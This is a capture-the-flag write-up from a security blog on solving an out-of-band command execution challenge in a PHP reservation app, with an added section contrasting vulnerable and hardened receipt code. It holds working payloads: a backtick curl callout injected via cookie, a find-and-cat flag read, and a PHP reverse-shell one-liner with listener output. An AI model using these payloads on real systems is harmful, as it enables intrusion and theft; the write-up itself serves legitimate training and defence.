Out-of-Band Remote Command Execution Challenge Write-up | VULLNERABILITY

Out-of-Band Remote Command Execution Challenge (Write-up)

As the world's leading cyber threat service, we decided to create cybersecurity challenges to draw attention to new bypass techniques and methods. We created our first challenge on 13.05.2020; a total of 38 researchers solved it, and we have listed them on our challenges page. As we promised, one of those researchers (Sivanesh Ashok - @sivaneshashok) has won the PentesterLab subscription for 3 months.

In our first challenge, we focused on remote command execution and out-of-band exploitation techniques. One of the participants, Hakkı Dizdar aka enjloezz, did not turn us down and accepted our offer to cooperate: he wrote a write-up for this challenge, and we are publishing it for you as a guide. Thanks to Hakkı, let us learn how he solved this challenge.

We are with you, enjloezz

Hello, this is enjloezz and today we will be looking at the "Out-of-band Remote Command Execution" challenge. First of all, many thanks to the VULLNERABILITY team. It was a great distraction from my homework. :)

Thanks to the challenge name, we know it's RCE, which narrows our perspective. The first thing we do is try to figure out how it works: what's the mechanism behind it, and how can we exploit it? To be able to answer these questions, you need to use this app as intended. It's a really basic reservation app for a restaurant. You enter your name, choose a table, and you get a reservation.


OOB RCE Challenge 1

The next thing to do is to look at the receipt to see if there is something interesting there.


OOB RCE Challenge 2

Receipt URL: https://lab.takeover.host/receipts/username_receiptcode

To test whether it's a static file or not, I tried some extensions like php, txt and html, and txt worked. So our file name is: username_receiptcode.txt. That's good to know, but there is nothing more useful, so back to basics: look at the HTTP requests to find out which programming language they are using, in order to create an attack vector.

Content-type: text/html; charset=UTF-8
Date: Wed, 13 May 2020 21:01:28 GMT
Ms-Author-Via: DAV
Server: nginx
Set-Cookie: name=test
Status: 200
X-Powered-By: PHP/7.4.5
X-Powered-By: PleskLin

PHP 7.4.5, nginx and Plesk: good to know. Another useful thing in the response headers is the Set-Cookie header, which contains my name. Let's look at our cookies; maybe there is something more useful than the name. We are getting closer to understanding the mechanism. They are using file storage instead of a database, and they are storing the entered values in a txt file. The next step is fuzzing parameters.

Since it is known that the vulnerability is OOB RCE, we can start with blind RCE techniques such as sending HTTP, DNS or ICMP requests. I used webhook.site for testing HTTP payloads. I deleted the 'reserved' cookie and edited my 'name' cookie.

Payload: name=`curl https://webhook.site/b2458f08-4b7f-490f-ba2b-e99d8e3cbdce`

Finally, I could capture the incoming request:

OOB RCE Challenge 3

We successfully got command execution on the target server. We can simply read the flag on the receipt page or we can get a reverse shell; it's your choice.

  • Reading the flag without getting a reverse shell
  • What will happen if we enter the payload in place of the table parameter in the cookie? Let us change the 'table' cookie to table=`find / -name flag.txt -exec cat {} \;`

    Boom, the receipt file has changed and the server printed the content of flag.txt as the table name:

    OOB RCE Challenge 3

  • Getting a reverse shell and reading the flag
  • To get a reverse shell, we can use the information we gathered before: they are using PHP 7.4.5, nginx and Plesk. With a little searching, we figured out the path of Plesk's PHP binary, and using this we can get a reverse shell.

    PHPBIN location: /opt/plesk/php/7.4/bin/php

    Our payload: table=`/opt/plesk/php/7.4/bin/php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'`

    Its output on my computer:

    C:\Users\enjloezz> nc -nvlp 4444
    listening on [any] 4444 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 60817
    sh: no job control in this shell
    sh-4.2$ id
    id
    uid=10000(normaluser) gid=1004(psacln) groups=1004(psacln) context=system_u:system_r:unconfined_service_t:s0
    sh-4.2$ find / -name flag.txt -exec cat {} \;
    VULLN{FOUND_FLAG_GIVE_ME_THE_LAB}
    


    That's it for today. Thanks to VULLNERABILITY and good luck on PentesterLab. :)

    Do you have any questions or suggestions? Feel free to contact me via Discord: enjloezz#7444
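The root cause behind the behaviour shown in the write-up, as an added example that is not part of the original write-up and not the challenge's own source: a PHP receipt writer that passes cookie values to a shell, next to a form that validates them and never invokes a shell. The function names, the `receipts` directory, the receipt layout and the numeric table rule are all assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed VULNERABLE shape (never called here; the real source is not on the page):
// cookie values land inside a double-quoted shell string, where /bin/sh
// still expands backticks and $(...) before echo runs.
function write_receipt_vulnerable(string $name, string $table, string $code): void
{
    shell_exec("echo \"Name: $name Table: $table\" > receipts/{$name}_{$code}.txt");
}

// HARDENED shape: allow-list validation, file API only, no user input in the path.
const RECEIPT_DIR = __DIR__ . '/receipts';   // assumed storage directory

function valid_name(string $v): bool
{
    // Letters, digits, space, dot, hyphen; 1-40 chars. Rejects ` $ ( ) ; | / and newlines.
    return preg_match('/\A[A-Za-z0-9 .\-]{1,40}\z/', $v) === 1;
}

function valid_table(string $v): bool
{
    // Assumption: a table is a number from 1 to 999, not free text.
    return preg_match('/\A[1-9][0-9]{0,2}\z/', $v) === 1;
}

function write_receipt(string $name, string $table): ?string
{
    if (!valid_name($name) || !valid_table($table)) {
        return null;                       // reject outright, do not try to "clean" it
    }
    if (!is_dir(RECEIPT_DIR) && !mkdir(RECEIPT_DIR, 0750, true)) { return null; }
    $code = bin2hex(random_bytes(16));     // server-generated, unguessable
    $path = RECEIPT_DIR . '/' . $code . '.txt';
    $body = "Name: {$name}\nTable: {$table}\n";
    return file_put_contents($path, $body, LOCK_EX) === false ? null : $path;
}

// Constructed sample inputs, including the shape of cookie value used in the write-up.
$samples = [
    ['enjloezz', '4'],
    ['`curl https://example.invalid/`', '4'],
    ['test', '`find / -name flag.txt -exec cat {} \;`'],
];
foreach ($samples as [$n, $t]) {
    printf("%-60s => %s\n", json_encode([$n, $t]),
        write_receipt($n, $t) === null ? 'rejected' : 'written');
}
```

Only the first sample is written; the two values containing backticks are rejected before any file or process is touched. Where a shell call cannot be avoided, each argument should at minimum go through `escapeshellarg()`.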

    Alternative Write-ups

    There are lots of methods to solve this challenge! Alternatively, Aqeel Asif aka Ciph3r00t wrote a very detailed write-up and Ozan Agdepe of the VULLNERABILITY team has recorded a video for this.

    Read Ciph3r00t's awesome write-up: CTF — Out-Of-Band RCE Solution by Ciph3r00t

    Thanks to Ozan Agdepe, you can watch his video.

    Also, we would like to thank PentesterLab for their sponsorship of this challenge. Of course, special thanks to all participants! :)




    Date:  May 17, 2020